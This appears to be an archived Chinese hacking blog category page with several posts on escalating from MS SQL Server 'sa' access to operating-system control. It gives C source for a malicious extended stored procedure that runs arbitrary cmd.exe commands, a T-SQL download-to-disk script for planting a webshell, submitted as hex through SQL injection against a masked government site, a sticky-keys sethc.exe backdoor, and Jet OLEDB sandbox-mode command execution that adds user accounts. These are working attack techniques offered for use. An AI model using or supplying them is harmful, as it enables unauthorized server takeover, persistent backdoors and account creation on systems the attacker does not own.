Chinadu's Blog » SA

xp_hello.dll(sa) 提权

Chinadu — Thu, 26 Aug 2010 13:30:56 +0000

来源：冰点论坛 2月

主要代码：

在VC6里面新建一个储存过程项目，在proc.cpp中写入如下代码：

#include

#include

#define XP_NOERROR 0

#define XP_ERROR 1

#define MAXCOLNAME 25

#define MAXNAME 25

#define MAXTEXT 255

#ifdef __cplusplus

extern “C” {

#endif

RETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc);

#ifdef __cplusplus

}

#endif

RETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc)

{

/***************************** 说明 *************************

由于本人人品不好还是怎么的，库里没有srv_paraminfo函数，卧槽，

无赖之下，只好用老式的srv_paramdata

*************************************************************/

int bufLen;

DBCHAR spName[MAXNAME];

DBCHAR spText[MAXTEXT];

DBCHAR spBuf[MAXTEXT];

unsigned char cmdline[255] = “”;

if(srv_rpcparams(srvproc) != 1) return XP_ERROR; //参数判断，如果参数不是1个就立即退出

bufLen = srv_paramlen(srvproc,1);

if(!bufLen) return XP_ERROR;

wsprintf(spBuf,(DBCHAR*)srv_paramdata(srvproc,1));spBuf[bufLen] = ‘\0′; //获取第一个参数的值

wsprintf(spName, “xp_hello”);

wsprintf(spText, “%s Run command:[%s]\r\n\t\t\tMSN:ylbhz@hotmail.com”, spName,spBuf);

srv_sendmsg(srvproc,SRV_MSG_INFO,0,(DBTINYINT)0,(DBTINYINT)0,NULL,0,0,spText,SRV_NULLTERM); //发送消息

wsprintf((char*)cmdline,”/c %s”,spBuf); //构造参数

ShellExecute(0,”open”,”cmd.exe”,(char*)cmdline,NULL,SW_SHOW); //执行命令

return XP_NOERROR ;

}

编译生成xp_hello.dll

以SA连接SQL Server 执行

dbcc addextendedproc(‘xp_hello’,'c:\xp_hello.dll’);

提示成功过后，调用

exec xp_hello ‘net user fuck fuck /add’;

这样系统里面就多了个fuck账户

C:\Documents and Settings\Administrator\桌面\工作区间\C\Debug>net user

\\PC-200910151119 的用户帐户

—————————————————————————–
Administrator ASPNET fuck
Guest HelpAssistant IUSR_PC-200910151119
IWAM_PC-200910151119 SQLDebugger SUPPORT_388945a0
VUSR_PC-200910151119
命令成功完成。

2007年12月10日 -- sa 无xp_cmdshell下提限又一简单方法
2010年04月23日 -- rar.exe在提权中的妙用
2010年04月20日 -- 沙盒提权的小tips
2010年01月31日 -- 瑞星本地提权通杀利用代码
2009年12月22日 -- 关于搜狗拼音输入法提权的应用
2009年08月5日 -- Serv-U FTP Server v8 本地提权
2009年07月24日 -- xml.http 下载拿SHELL
2009年07月23日 -- 针对Dbowner权限下的提权脚本(转)
2009年06月25日 -- sa权限下无xp_cmdshell下取权限又一简单方法
2009年05月14日 -- 关于html本地权限问题

xml.http 下载拿SHELL

Chinadu — Fri, 24 Jul 2009 03:22:03 +0000

注意以下语句在SA权限下执行，对于N多扩展存储过程被删除时使用效果最佳:

DECLARE
@B varbinary(8000),
@hr int,
@http INT,
@down INT
EXEC sp_oacreate [Microsoft.XMLHTTP],@http output ;EXEC @hr = sp_oamethod @http,[Open],null,[GET],[要下载的文件地址],0 ;EXEC @hr = sp_oamethod @http,[Send],null ;EXEC @hr=sp_OAGetProperty @http,[responseBody],@B output ;EXEC @hr=sp_oacreate [ADODB.Stream],@down output ;EXEC @hr=sp_OASetProperty @down,[Type],1 ;EXEC @hr=sp_OASetProperty @down,[mode],3 ;EXEC @hr=sp_oamethod @down,[Open],null ;EXEC @hr=sp_oamethod @down,[Write],null,@B ;EXEC @hr=sp_oamethod @down,[SaveToFile],null,[保存在服务器上的绝对路径],1 ;--
将以上代码修改后转化为十六进制。然后提交：
http://www.XXXX.gov.cn/XXX/hdsq/XXXXfo.jsp?ID=8 ;DECLARE @S VARCHAR(4000);SET @S=CAST(十六进制代码 AS VARCHAR(4000));EXEC(@S);--

2010年08月26日 -- xp_hello.dll(sa) 提权
2009年06月25日 -- sa权限下无xp_cmdshell下取权限又一简单方法
2007年12月10日 -- sa 无xp_cmdshell下提限又一简单方法
2007年11月18日 -- SA下不用恢复xp_cmdshell和xplog70.dll也执行命令

sa权限下无xp_cmdshell下取权限又一简单方法

Chinadu — Thu, 25 Jun 2009 09:21:55 +0000

有了sa但无xp_cmdshell ，怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块，反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法
（很多服务器都把'wscript.shell'给删了。）
看到既然能用sp_oacreate，sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject
网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制，删除文件吧。。
上网找了些资料，得到下面方法：
复制文件：

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

成功后3389登陆按五次shift键。成功进入服务器。一直向上点"我的电脑"右键"管理" 用户管理直接加用户。
此法随无技术可言，希望对某些人有点用。

2010年08月26日 -- xp_hello.dll(sa) 提权
2009年07月24日 -- xml.http 下载拿SHELL
2007年12月10日 -- sa 无xp_cmdshell下提限又一简单方法
2007年11月18日 -- SA下不用恢复xp_cmdshell和xplog70.dll也执行命令

sa 无xp_cmdshell下提限又一简单方法

Chinadu — Sun, 09 Dec 2007 16:58:10 +0000

declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

成功后3389登陆按五次shift键。成功进入服务器。一直向上点”我的电脑“右键“管理” 用户管理直接加用户。
此法随无技术可言，希望对某些人有点用。

2010年08月26日 -- xp_hello.dll(sa) 提权
2010年04月23日 -- rar.exe在提权中的妙用
2010年04月20日 -- 沙盒提权的小tips
2010年01月31日 -- 瑞星本地提权通杀利用代码
2009年12月22日 -- 关于搜狗拼音输入法提权的应用
2009年08月5日 -- Serv-U FTP Server v8 本地提权
2009年07月24日 -- xml.http 下载拿SHELL
2009年07月23日 -- 针对Dbowner权限下的提权脚本(转)
2009年06月25日 -- sa权限下无xp_cmdshell下取权限又一简单方法
2009年05月14日 -- 关于html本地权限问题

SA下不用恢复xp_cmdshell和xplog70.dll也执行命令

Chinadu — Sun, 18 Nov 2007 15:42:38 +0000

sa下删除xp_cmdshell和xplog70.dll时候的一种办法，不算新的了，
也被一些人不断的再次提出来，
为了方便自己记忆再写出来，
在这种情况下，要执行命令，条件是要有xp_regwrite。

首先开启沙盘模式：

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')

2012年01月31日 -- 命令行导出IIS配置信息
2011年11月24日 -- 域内指定用户中马
2011年06月6日 -- Linux下MySQL的load_file常用路径
2011年06月6日 -- linux渗透小技巧
2010年08月26日 -- xp_hello.dll(sa) 提权
2010年05月5日 -- 搞内网的一个小技巧
2010年04月22日 -- 更改windows2003最大连接数
2010年03月1日 -- 让千千静听不再弹出广告
2010年01月19日 -- 手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】
2009年11月5日 -- MySQL导入数据库文件最大限制2048KB的修改解决办法

Chinadu's Blog » SA

xp_hello.dll(sa) 提权

相关文章

xml.http 下载拿SHELL

相关文章

sa权限下无xp_cmdshell下取权限又一简单方法

相关文章

sa 无xp_cmdshell下提限又一简单方法

相关文章

SA下不用恢复xp_cmdshell和xplog70.dll也执行命令

相关文章